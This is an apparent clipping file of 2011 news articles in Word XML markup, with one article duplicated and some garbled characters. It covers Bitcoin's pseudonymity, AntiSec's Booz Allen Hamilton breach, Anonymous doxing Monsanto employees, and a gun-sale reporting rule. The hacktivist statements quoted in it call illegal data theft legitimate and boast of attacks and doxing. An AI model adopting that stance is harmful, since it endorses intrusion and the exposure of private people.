We, the people, are silent no more. [Remember], the ones you arrested and charged are your protesting citizens.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in the name of democracy, let us all unite... @FBIPressOffice, etc: Hard to believe for you, but we are NOT you enemy. Find out why and fix this planet!"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Б─╗Predictably, Anonymous activists participating in the AntiSec movement have remained relatively unfazed by the recent crackdown against the group; as they continue to conduct hack and extract ops despite the obvious and increased risk. Б─╗</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still wonder why we are not worrying. It is bigger than us all. Individuals do not matter, #AntiSec will move on. We [really] are not scared anymore. Everybody involved knew exactly what [they were] getting into. And we will continue until all battleships are sunk.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we steal data. From governments and their contractors. We know it's illegal but we honestly believe it is legitimate. We wish it was not so, but we HAVE to break the law to make a change. The laws need to change otherwise no dice. Should this account become silent, you, FBI, may book a victory. [Still], with every day that passes, we store more of your secrets."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about: Security Features anonymous AntiSec Free Topiary jake davis LulzSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>TG Daily 2011.08.02 23:31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.tgdaily.com/security-features/57647-anonymous-kicks-off-free-topiary-campaign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Banking | 29.07.2011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not so anonymous, Irish researcher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Großansicht des Bildes mit der Bildunterschrift: Bitcoin proponents say assigning assigning value to a piece of metal is no less strange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digital currency has risen rapidly since its inception in 2009. Increasingly drawing the attention of the tech community and governments alike, Bitcoin is not without its flaws.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Sunday, Martin Harrigan, a communications researcher at the University College Dublin, published an academic paper outlining why the emerging digital currency, Bitcoin, is not as anonymous as some people might think. In June 2011, WikiLeaks famously announced that it was accepting "anonymous" donations via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which was developed in 2009, is a purely online digital currency that is fully convertible to euros, US dollars and other world currencies. At current exchange rates, one Bitcoin is worth approximately 9.5 euros, or $13.75. The system works largely through cryptography, and lets its users "mine" for Bitcoins through software on their computers that plug away at large, complicated puzzles.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Bildunterschrift: Großansicht des Bildes mit der Bildunterschrift: Martin Harrigan's paper outlines why Bitcoin is not an anonymous payment systemOver time, Bitcoins become harder and harder to mine, and Bitcoins will cease to be generated once they reach 21 million Bitcoins, and thus, theoretically, will preserve their value. It is not regulated or controlled by any organization, government or other financial authority. In June 2011, the American senator, Chuck Schumer, of New York, mentioned Bitcoin by name in conjunction with a website that sells illegal drugs and only accepts Bitcoin as currency. However, Jeff Garzik, one of Bitcoin's primary developers, has repeatedly told journalists: "Attempting major illicit transactions with Bitcoin, given existing statistical analysis techniques deployed in the field by law enforcement, is pretty damned dumb."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blog post in May 2011, Rick Valkvinge, the founder of the Swedish Pirate Party, wrote that he had converted all of his savings into Bitcoins, citing the fact that the value of a single Bitcoin has gone up by more than one thousand times over the last 14 months. Bitcoin's proponents say that one of its main advantages is that it is fully peer-to-peer and open source, so that it can be monitored by the community that uses it. Further, it can be instantly exchanged between two people, without going through a bank or other financial institution.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learn more, Deutsche Welle turned to Martin Harrigan to explain Bitcoin and his research.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Deutsche Welle: How did you first get involved in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Martin Harrigan: Last year, myself and a colleague of mine at the University College Dublin we got chatting one day and he had gotten interested in Bitcoins and he had bought some himself and we started talking about the mechanics of how it works. And I guess one thing that troubled us a little bit is that if I send a Bitcoin to you, I have to notify the entire network of this so I have to tell everyone that an identity that I have to prove that I'm in control is being sent to an identity to you and you have to prove that you're in control of.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Bildunterschrift: Großansicht des Bildes mit der Bildunterschrift: Bitcoins can be exchanged for euros or dollarsSo what's wrong with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idea of publicly broadcasting your Bitcoin activity sounds possibly dangerous. Many people have described Bitcoin as a digital analog of cash. So, like, I can give you cash without getting the banks involved. The claim was that I could also give you Bitcoins without getting the banks involved, and so, in some sense, there would be no record of this. But with Bitcoins, everyone gets notified. Everyone on the peer-to-peer network can see that somebody sent Bitcoins to somebody. We thought this was interesting, because if you consider all the activity of Bitcoins in one day - say someone sends Bitcoins to somebody else and then he sends that on to another person, then it might be possible to generate a network, to figure out where the Bitcoins are going.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you're saying that given that it produces a trail, and it has to produce the trail for the system to be trusted, that it's not as anonymous as people claim?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to be fair, originally the system was never described as anonymous, but the developers would say that it's rather pseudo-anonymous. So you use some identifier and that's all that can be traced back to you. There are two things: The first is that the media often say that Bitcoin is anonymous, and I would say that anyone that works in the development of Bitcoin would agree that these reports are wrong.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thing is that Bitcoin has this unusual property that if I receive Bitcoins from two sources, A and B, I can generate one identity to receive the Bitcoins from A and I can generate a second identity to receive the Bitcoins from B and there's no way to link these two identities. However, maybe in a couple months time, I can perform another Bitcoin transaction and where I send these Bitcoins to C. This third transaction can link A and B. So by joining the Bitcoins together in my wallet, A and B, and sending them to C, I've revealed that previously the two identities that I used to receive the money from A and B are controlled by the same person.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Bildunterschrift: Großansicht des Bildes mit der Bildunterschrift: WikiLeaks famously announced in June 2011 it would accept donations via BitcoinSo it has this worrisome property that later transactions can give you information about the identity of the people that performed the earlier transactions. And if you couple this with the fact that some people - sometimes intentionally - put on Bitcoin forums, on the Web, or on their Twitter accounts, they often make their identities public. So you might have one identity you're willing to make public if you want to accept Bitcoin donations, but the danger is that that can be linked with your other, more private, identity. So by looking at the logs that the system is producing, people can piece together to see that these three, four or five identities are controlled by the same person. And if you can link that to something that somebody posted online, then you can possibly identify the person that performed these transactions.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gets into a whole series of questions about what is the nature of money and how do you arbitrarily assign value to something that is purely digital? In some ways that's no different than saying that this small piece of money in my hand is a euro, and that has value.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absolutely. When you go online for the first time to a Bitcoin exchange and part with your dollars or your euros for Bitcoins it is a disconcerting feeling that you've just parted with real money because in exchange you just have some sort of digital token. But when you then exchange those tokens back for euros or dollars or are able to buy something on a website, you begin to realize that it is capable of carrying value. But it is strange the first time you use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Bildunterschrift: Großansicht des Bildes mit der Bildunterschrift: Bitcoin allows monetary transfers without going through a third-party, like PayPalWhat's the motivation for people to use Bitcoin? It seems that it's gotten a lot of uptake in the geek, cryptography crowd. What's the main motivating factor for people to use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if we assume that Bitcoin became very popular and would be accepted by many merchants and used by a lot of people, it's because it has a lot of advantages over a system like PayPal. The transaction fees are much lower, and it's relatively instant. You don't have to wait for a trusted third party to get involved. And it's one currency that can be used all over the world. You don't have to use your euros or dollars. There are no exchange rates and there are no fees for exchange rates.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also no charge-backs. Anytime you make a payment with PayPal or with your credit card, there's a classic scam where a customer makes a payment and then revokes that payment, but then the merchant has to do something in order to get their goods back. And the cost of handling all this and the fees that go to credit card companies, they are all removed with Bitcoin. You don't have to pay any company to handle the payment. There's no restriction that banks are only operating five days a week, and closed on the weekends, Bitcoin operates 24/7 and you don't have to rely on these third-parties. It has a lot of extremely interesting advantages. I can see some sort of descendant of Bitcoin becoming popular in the future.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Interview: Cyrus Farivar Editor: Nathan Witkop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Deutsche Welle 2011.07.29 17:12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.dw-world.de/dw/article/0,,15276051,00.html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Coin of the cyber realm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the geek set hopes to create a new world currency, one that relies on a network of users, not on a central banker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ARI ALTSTEDTER, The Ottawa Citizen July 18, 2011 8:01 PM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StoryPhotos ( 2 )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Images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one dollar blanks symbolize the rapid growth of an online currency called bitcoin. Unlike the case with conventional currencies, bitcoin is managed by a distributed network of users, not a central banker.Photograph by: Stephen Hilger,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OTTAWA Money may be the next frontier of the Internet revolution thanks to Bitcoin, a burgeoning new digital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that tracks, trades and stores bitcoins is free, and its code is public. This means anyone can change it, either because they hope to make it better or to provide themselves with some advantage.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those changes wont take effect unless everyone else downloads the new version. For bitcoin devotees this is a truly democratic monetary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and economic power has always been concentrated with a very few people, said Jared Kenna, one of the founders of Tradehill.com, an online bitcoin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this shows people that that can be changed. I think it brings a lot more power to the individual person.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not issued by any central bank or institution, but claims to be impossible to counterfeit or manipulate. The bitcoin trades on a peer-to- peer network of hundreds of thousands of computers, operating much as networks that share music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bitcoins exist only online, the money that has been put into bitcoins is very real. In the last few weeks bitcoins have been trading for about $15 U.S. on a leading online exchange, though daily swings can be huge.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6.2 million bitcoins floating around cyber space, that puts the currencys total value at around $93 million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the geek community thats adopted it so enthusiastically, bitcoin is more than just an investment: its a programming marvel.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of a decentralized cyber currency has been kicking around tech circles for awhile, even appearing in cyberpunk novels in the late 1990s. But no one could figure out how to prevent people from counterfeiting a digital currency without the help of some central body to monitor everything. It seemed online payments couldnt work without oversight from banks, credit card companies, or online payment services like PayPal, which serve as a trusted intermediary to make sure accounts are credited and debited properly.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in 2009 a solution suddenly appeared, attributed to Satoshi Nakomoto, an unknown who has since disappeared. Most people assume the name is a pseudonym, but whoever he or she is, programmers soon discovered the author had left behind a work of art.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like the Mona Lisa. said Bruce Wagner, an IT consultant who discovered bitcoin in October and now hosts an online TV show about it. Its a masterpiece of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Nakomoto solved two problems that have frustrated the development of online currency: hackers can steal your online identity to rob your online money, or game the system to spend their money twice. They can also just mint it themselves.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solved the problem of identity theft through whats known as public key cryptography a method of encryption that many banks, militaries and e- mail providers use to make sure the only computer that can decode a certain message, is the computer that message is meant for.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Nakomotos real genius lay in the method he devised to prevent counterfeiting.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counterfeit digital currency by spending bitcoins you dont have, either by programming them into existence yourself, or erasing the record of bitcoins youve already spent so you can spend them again.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gets around this by distributing a public master list of every bitcoin transaction to every computer in the network. Bitcoin transactions are broadcast to the network at large so everyone elses wallet, the free piece of software that inducts users into the network, can check them against the master list. Once enough computers approve the new transaction one of them can add it to the masterlist, which then gets redistributed throughout the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determine which computer updates the list, and prevent it from sneaking in a bogus transaction, bitcoin holds a competition for the privilege. It sets a cryptographic puzzle that can only be solved through trial and error. Any computer with a wallet set to take part in the competition races to solve this puzzle. The puzzle is so difficult that even a very powerful computer will only solve it rarely, but with enough computers in the network all racing to solve the puzzle, someone solves it every 10 minutes, but no one can predict who. This means the network can approve transactions in a timely manner, but no individual can count on solving the puzzle to slip in a bogus transaction.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 that solves the puzzle gets a reward of 50 automatically generated bitcoins. This is how new bitcoins enter the economy, up to a maximum of 21 million.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Enthusiasts love bitcoins because they say that ceiling means no central bank can devalue their bitcoins by printing more. Another advantage devotees give is that bitcoin does not require them to trust a middle man with their money or personal information, making it as anonymous as cash in the real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say if you want to make payments or send money online its easier to set up than PayPal or a credit card, processes transactions faster than either, and all without any fees or paperwork. However, arranging to make deposits and payments into your real world bank account is still a rather laborious process, especially for web neophytes.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Lawrence White, a specialist in monetary theory at George Mason University in Virginia, is skeptical about bitcoins chances of going mainstream.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who are computer savvy regard it as, you know, cool. And people who are into financial privacy like it because it has these privacy features. But expecting it to become a widely accepted medium of exchange is very speculative at this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says the only way for that to happen is for a critical mass of merchants to start accepting it. Right now most bitcoin transactions are done by speculators and although there are some people accepting them for goods and services (anything from web design, to novelty dice, to beef jerky) White says its not nearly enough.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then theres the technical barrier. People who dont understand Nakomotos cryptography may not trust their money with it. And its not as if bitcoins are unstealable.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bitcoins are kept on your computer in your wallet, and just like a real wallet its your job to keep it safe. Aside from your whole computer being stolen, theres the danger of viruses: at least one virus has already been spotted that steals bitcoin wallets. Theres even a virus that attaches itself to a number of computers and uses a bit of computing power from each to solve the network puzzle. Whoever sent out the virus gets the 50 bitcoin reward.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dangers that most people dont understand, let alone know how to defend against, but bitcoin exchange manager Jared Kenna says the growing number of programmers working on bitcoin, and bitcoin services, will sort this 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Itll become a lot easier: usability will increase, safety and security will increase. Theres talks right now of making the wallet encrypted by default, things like that. So its going to go from computer nerd Linux version, that its like now, to an Apple version that my mom can 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governments will have their say first.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U.S senators recently sent a letter to the attorney general and the DEA raising concerns about an online drug market called Silk Road. The only currency Silk Road accepts is bitcoins. Because of the difficulty of shutting down the market itself, message boards have been buzzing with fears that bitcoins would become a target instead.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Governments may have as little success stamping out bitcoins as they have had with illegal file sharing. A peer-to-peer network like bitcoin has no server to shutdown or ring leader to prosecute.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supporters, government fears are unjustified because bitcoin is no more anonymous or untraceable than cash. And many of them believe bitcoins spread is as inevitable as the Internet itself and could be just as profitable.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remember, 15 years ago if you were doing anything on the Internet you were going to make millions, said Kenna. I think it could be the same with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Copyright (c) The Ottawa Citizen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ottawa Citizen 2011.07.19 03:33</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.ottawacitizen.com/Coin+cyber+realm/5121396/story.html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AntiSec Exposes U.S. Soldiers' S/Ns, Passwords, Vows Attack on Monsanto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Ex-LulzSec members and their new help from Anonymous continue to wreak havoc on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AntiSec, first a project launched by infamous hacker group LulzSec [1][2][3][4][5][6][7][8][9][10][11][12][13][14], and later the name of a new hacker collective formed by members of the now-defunct LulzSec, continues to strike. Its mission is to attack international governments and corporate interests.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Who is Booz Hamilton and Why Were They Hacked?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like the February attack on HBGary by Anonymous, or the late May attack on Infragard - a private sector affiliate of the U.S. Federal Bureau of Investigation - the latest attack focused not on official government servers, but on a contractor with weaker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time around AntiSec's victim was Booz Allen Hamilton, a prestigious contractor with hundreds of millions of dollars of contracts in its name. Booz Hamilton employs former U.S. Central Intelligence Agency director Robert James Woolsey Jr. and former U.S. National Security Agency director John Michael "Mike" McConnell.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AntiSec says it targeted the group for a couple of reasons. First, it points to the company's alleged complicity in monitoring private sector financial transactions during the SWIFT investigation. Second, it writes about a secret social engineering project which HBGary and Booz Hamilton cooperated on, stating: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more interesting, and sadly overlooked, stories to emerge from HBGary's email server (a fine example to its customers of how NOT to secure their own email systems) was a military project - dubbed Operation Metal Gear by Anonymous for lack of an official title - designed to manipulate social media. The main aims of the project were two fold: Firstly, to allow a lone operator to control multiple false virtual identities, or "sockpuppets". This would allow them to infiltrate discussions groups, online polls, activist forums, etc and attempt to influence discussions or paint a false representation of public opinion using the highly sophisticated sockpuppet software. The second aspect of the project was to destroy the concept of online anonymity, essentially attempting to match various personas and accounts to a single person through recognition shared of writing styles, timing of online posts, and other factors. This, again, would be used presumably against any perceived online opponent or activist.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HBGary Federal was just one of several companies involved in proposing software solutions for this project. Another company involved was Booz Allen Hamilton. Anonymous has been investigating them for some time, and has uncovered all sorts of other shady practices by the company, including potentially illegal surveillance systems, corruption between company and government officials, warrantless wiretapping, and several other questionable surveillance projects. All of this, of course, taking place behind closed doors, free from any public knowledge or scrutiny.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>II. What Was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did AntiSec take from Booz Hamilton? The contents of the heist are available here, courtesy of a torrent hosted by The Pirate Bay.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AntiSec made off with 90,000 logins of both private and public sector employees, which include members of the U.S. Military. Members of US CENTCOM, SOCOM, the Marine Corps, various Air Force facilities, Homeland Security, State Department staff, and what looks like private sector contractors were all exposed.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passwords are hashed, but they use a very weak unsalted MD5 hash (128- bit), meaning that they should be available in rainbow tables, which these days are even available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breach is very serious, given how people recycle their passwords in numerous locations. Given the number of exposed logins, it's likely that it will expose at least some soldiers to possible malicious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AntiSec claims to have run a shell and used it to delete source code on the company's SVN server. Honestly, this isn't exactly something they should be lauding, as virtually all defense contractors use extensive tape backups and likely can restore the code without much difficulty. Ultimately this amounts to a mere annoyance, and perhaps a few lost hours of productivity.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more significant department, AntiSec claims to have obtained "maps and keys" to other security contractors. This could lead to additional attacks, so contractors who could be a target should definitely take a look at the distributed file.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Hacktivism?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 it's hard to condone the kind of social engineering that Booz Hamilton is accused of conducting, but the way that AntiSec went about its intrusion seems rather unfortunate and childish. Rather than gain access to email, which could actually prove such allegations and put them in context, it instead attacked U.S. soldiers, who already have their hands full.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Booz Hamilton indeed engaged in social engineering, it's unclear who exactly it directed those efforts against. Obviously, if it was trolling jihadist forums in an attempt to subvert them, that would be significantly different than, say, trolling U.S. political forums.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was the attack on Booz Hamilton justified? That depends on your perspective.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Booz Hamilton committed some very poor practices here, which should bring its contracts into question. First, it clearly did not properly protect its gateway machine. Second, much like Bitcoin-mega exchange Mt. Gox, it used an unacceptably weak level of encryption, exposing its users to harm. Third, it failed to code its databases to avoid SQL injection attacks, which should be mandatory for any contractor working with classified materials.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Monsanto Attacked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related news, Anonymous vowed Monday to step up attacks on contractor Monsanto Comp. (MON).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Monsanto is a firm with a long and controversial history. It is accused of abusing intellectual property rights to sue small farms (allowing its patented crops to blow seeds onto their properties, then suing them); trying to bribe officials in Canada and Indonesia [1][2]; and suing dairy farmers who advertise that their milk doesn't contain growth hormones. And they also were the company responsible for spraying Agent Orange all over soldiers in Vietnam, which is thought to have led to cancer and other ailments.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broke the news of new possible attacks, writing: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@MonsatoCo is now suing small dairy farmers for advertising that they use no growth hormones. For NOT using their product.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The operation's Twitter account "OpMonsanto", posted on June 26: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going to hit @MonsantoCo with something a little bit more serious than a DDoS this time around. Fuck 'em. #ExpectUs It posted a brief press release, writing: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2 months we have pushed the exposure of hundreds of pages of articles detailing Monsanto's corrupt, unethical, and downright evil business practices. We've created a nice go-to reference guide on piratepad/anonpad(anonpad.org/opmonsanto, backed up elsewhere), where anyone can read up on and add their own info about MonsantoCo.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blasted their web infrastructure to shit for 2 days straight, crippling all 3 of their mail servers as well as taking down their main websites world-wide. We dropped dox on 2500+ employees and associates, including full names, addresses, phone numbers, and exactly where they work. We are also in the process of setting up a wiki, to try and get all collected information in a more centralized and stable environment. Not bad for 2 months, I'd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next? Not sure... it might have something to do with that open 6666 IRC port on their nexus server though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Expect Us It indeed "doxed" Monsanto's employees - in fact it appears to have exposed the names and addresses of 2,500+ of them. How this information might be used/abused is unknown, but it could lead to at least some minor harassment.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Who is Anonymous/AntiSec/Etc. Again?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is a group without a leader. The group has tens of thousands of members worldwide. However, not all members are skilled hackers.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with Anonymous have a tendency to break off into smaller subgroups. For example LulzSec, who conducted much griefing of gamers in recent months, was one such group. AntiSec, who targets governments and corporations, is another such group.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Nobody "leads" Anonymous or its subgroups. Someone simply suggests a target and willing members participate in the attack.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mass media has had much difficulty wrapping its head around the concept of Anonymous, though it appears most are finally starting to get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arose via people who met via the image-board site 4Chan, but today the group has grown well outside the confines of that site. The tricky thing when dealing with Anonymous or its subgroups is that the opinions or actions of one member are not necessarily those shared by another member.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Anonymous has been extremely active. Among other efforts, it helped to influence the revolutions in the Middle East and drive them along.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much of what Anonymous and its subgroups do can be viewed as hacktivism of sorts. However, whether the ends justify the means is a topic of much debate.</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2011.07.12 17:19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.dailytech.com/AntiSec+Exposes+US+Soldiers+SNs+Passwords+Vows+Attack+on+Monsanto/article22132.htm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AntiSec Exposes U.S. Soldiers' S/Ns, Passwords, Vows Attack on Monsato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Ex-LulzSec members and their new help from Anonymous continue to wreak havoc on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AntiSec, first a project launched by infamous hacker group LulzSec [1][2][3][4][5][6][7][8][9][10][11][12][13][14], and later the name of a new hacker collective formed by members of the now-defunct LulzSec, continues to strike. Its mission is to attack international governments and corporate interests.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Who is Booz Hamilton and Why Were They Hacked?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like the February attack on HBGary by Anonymous, or the late May attack on Infragard - a private sector affiliate of the U.S. Federal Bureau of Investigation - the latest attack focused not on official government servers, but on a contractor with weaker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time around AntiSec's victim was Booz Allen Hamilton, a prestigious contractor with hundreds of millions of dollars of contracts in its name. Booz Hamilton employs former U.S. Central Intelligence Agency director Robert James Woolsey Jr. and former U.S. National Security Agency director John Michael "Mike" McConnell.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AntiSec says it targeted the group for a couple of reasons. First, it points to the company's alleged complicity in monitoring private sector financial transactions during the SWIFT investigation. Second, it writes about a secret social engineering project which HBGary and Booz Hamilton cooperated on, stating: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more interesting, and sadly overlooked, stories to emerge from HBGary's email server (a fine example to its customers of how NOT to secure their own email systems) was a military project - dubbed Operation Metal Gear by Anonymous for lack of an official title - designed to manipulate social media. The main aims of the project were two fold: Firstly, to allow a lone operator to control multiple false virtual identities, or "sockpuppets". This would allow them to infiltrate discussions groups, online polls, activist forums, etc and attempt to influence discussions or paint a false representation of public opinion using the highly sophisticated sockpuppet software. The second aspect of the project was to destroy the concept of online anonymity, essentially attempting to match various personas and accounts to a single person through recognition shared of writing styles, timing of online posts, and other factors. This, again, would be used presumably against any perceived online opponent or activist.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HBGary Federal was just one of several companies involved in proposing software solutions for this project. Another company involved was Booz Allen Hamilton. Anonymous has been investigating them for some time, and has uncovered all sorts of other shady practices by the company, including potentially illegal surveillance systems, corruption between company and government officials, warrantless wiretapping, and several other questionable surveillance projects. All of this, of course, taking place behind closed doors, free from any public knowledge or scrutiny.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>II. What Was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did AntiSec take from Booz Hamilton? The contents of the heist are available here, courtesy of a torrent hosted by The Pirate Bay.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AntiSec made off with 90,000 logins of both private and public sector employees, which include members of the U.S. Military. Members of US CENTCOM, SOCOM, the Marine Corps, various Air Force facilities, Homeland Security, State Department staff, and what looks like private sector contractors were all exposed.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passwords are hashed, but they use a very weak unsalted MD5 hash (128- bit), meaning that they should be available in rainbow tables, which these days are even available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breach is very serious, given how people recycle their passwords in numerous locations. Given the number of exposed logins, it's likely that it will expose at least some soldiers to possible malicious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AntiSec claims to have run a shell and used it to delete source code on the company's SVN server. Honestly, this isn't exactly something they should be lauding, as virtually all defense contractors use extensive tape backups and likely can restore the code without much difficulty. Ultimately this amounts to a mere annoyance, and perhaps a few lost hours of productivity.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more significant department, AntiSec claims to have obtained "maps and keys" to other security contractors. This could lead to additional attacks, so contractors who could be a target should definitely take a look at the distributed file.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Hacktivism?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 it's hard to condone the kind of social engineering that Booz Hamilton is accused of conducting, but the way that AntiSec went about its intrusion seems rather unfortunate and childish. Rather than gain access to email, which could actually prove such allegations and put them in context, it instead attacked U.S. soldiers, who already have their hands full.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Booz Hamilton indeed engaged in social engineering, it's unclear who exactly it directed those efforts against. Obviously, if it was trolling jihadist forums in an attempt to subvert them, that would be significantly different than, say, trolling U.S. political forums.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was the attack on Booz Hamilton justified? That depends on your perspective.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Booz Hamilton committed some very poor practices here, which should bring its contracts into question. First, it clearly did not properly protect its gateway machine. Second, much like Bitcoin-mega exchange Mt. Gox, it used an unacceptably weak level of encryption, exposing its users to harm. Third, it failed to code its databases to avoid SQL injection attacks, which should be mandatory for any contractor working with classified materials.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Monsanto Attacked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related news, Anonymous vowed Monday to step up attacks on contractor Monsanto Comp. (MON).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Monsanto is a firm with a long and controversial history. It is accused of abusing intellectual property rights to sue small farms (allowing its patented crops to blow seeds onto their properties, then suing them); trying to bribe officials in Canada and Indonesia [1][2]; and suing dairy farmers who advertise that their milk doesn't contain growth hormones. And they also were the company responsible for spraying Agent Orange all over soldiers in Vietnam, which is thought to have led to cancer and other ailments.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broke the news of new possible attacks, writing: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@MonsatoCo is now suing small dairy farmers for advertising that they use no growth hormones. For NOT using their product.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The operation's Twitter account "OpMonsanto", posted on June 26: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going to hit @MonsantoCo with something a little bit more serious than a DDoS this time around. Fuck 'em. #ExpectUs It posted a brief press release, writing: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2 months we have pushed the exposure of hundreds of pages of articles detailing Monsanto's corrupt, unethical, and downright evil business practices. We've created a nice go-to reference guide on piratepad/anonpad(anonpad.org/opmonsanto, backed up elsewhere), where anyone can read up on and add their own info about MonsantoCo.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blasted their web infrastructure to shit for 2 days straight, crippling all 3 of their mail servers as well as taking down their main websites world-wide. We dropped dox on 2500+ employees and associates, including full names, addresses, phone numbers, and exactly where they work. We are also in the process of setting up a wiki, to try and get all collected information in a more centralized and stable environment. Not bad for 2 months, I'd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next? Not sure... it might have something to do with that open 6666 IRC port on their nexus server though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Expect Us It indeed "doxed" Monsanto's employees - in fact it appears to have exposed the names and addresses of 2,500+ of them. How this information might be used/abused is unknown, but it could lead to at least some minor harassment.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Who is Anonymous/AntiSec/Etc. Again?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is a group without a leader. The group has tens of thousands of members worldwide. However, not all members are skilled hackers.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with Anonymous have a tendency to break off into smaller subgroups. For example LulzSec, who conducted much griefing of gamers in recent months, was one such group. AntiSec, who targets governments and corporations, is another such group.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Nobody "leads" Anonymous or its subgroups. Someone simply suggests a target and willing members participate in the attack.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mass media has had much difficulty wrapping its head around the concept of Anonymous, though it appears most are finally starting to get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arose via people who met via the image-board site 4Chan, but today the group has grown well outside the confines of that site. The tricky thing when dealing with Anonymous or its subgroups is that the opinions or actions of one member are not necessarily those shared by another member.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Anonymous has been extremely active. Among other efforts, it helped to influence the revolutions in the Middle East and drive them along.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much of what Anonymous and its subgroups do can be viewed as hacktivism of sorts. However, whether the ends justify the means is a topic of much debate.</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2011.07.12 16:20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.dailytech.com/AntiSec+Exposes+US+Soldiers+SNs+Passwords+Vows+Attack+on+Monsato/article22132.htm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Certain Rifle Purchases Require Gun Sellers to Alert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2011, 4:16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U.S. Must Reveal If It Will Defend Б─≤DonБ─(tm)t Ask, DonБ─(tm)t TellБ─(tm) Obama Aide Brennan Asks Yemeni President Saleh to Step Down Geithner Says He Wants Б─≤LargestБ─(tm) Deal Possible on Deficit U.S. Can Avoid Default If Debt Limit Not Raised, Johnson Says U.S. Sends Assad Message With Envoy Visit to Protest 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Justin Blum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 from deputy attorney general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(Bloomberg) - Gun sellers in states on the U.S.- Mexico border will have to report to the federal government if a customer buys two or more semiautomatic rifles over five days that are greater than .22 caliber and include a detachable magazine.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requirement, part of a year-long pilot program, will improve the government's ability to detect illegal weapons- trafficking networks that divert firearms to criminals, said Deputy Attorney General James Cole in a statement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international expansion and increased violence of transnational criminal networks pose a significant threat to the United States," Cole said. The requirement will help "confront the problem of illegal gun trafficking into Mexico and along the Southwest border."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program will affect about 8,500 gun sellers in California, Arizona, New Mexico and Texas, said a Bureau of Alcohol, Tobacco, Firearms and Explosives official, who spoke on condition of anonymity and wasn't authorized to discuss the matter. They will be required to report the purchases to the ATF within 24 hours, the official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Jim Rubin, Laurie Asseo.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Justin Blum in Washington at jblum4@bloomberg.net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3000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 On Energy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Nissan Quickest to Recover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Baseball's 3000 Hit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CEO Guide to Assistive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and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The Rise and Inglorious Fall of Myspace The Best Undergraduate B-Schools of 2011 Want to Live Cheaply? Head to Texas Why Some Skypers Are Seeing Red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Want to Live Cheaply? Head to Texas Forever 21's Fast (and Loose) Fashion Empire The Rise and Inglorious Fall of Myspace Market America's American Dream Machine Career Women at Midlife: Sadder and Sicker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Mozilla's Crowdsourcing Mystique The Rise and Inglorious Fall of Myspace Can the FT Help Publishers Quit Their Apple Addiction? Audi's Design Drive How to Make SEO Work for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The 3000 Club World's Most Expensive Cities 2011 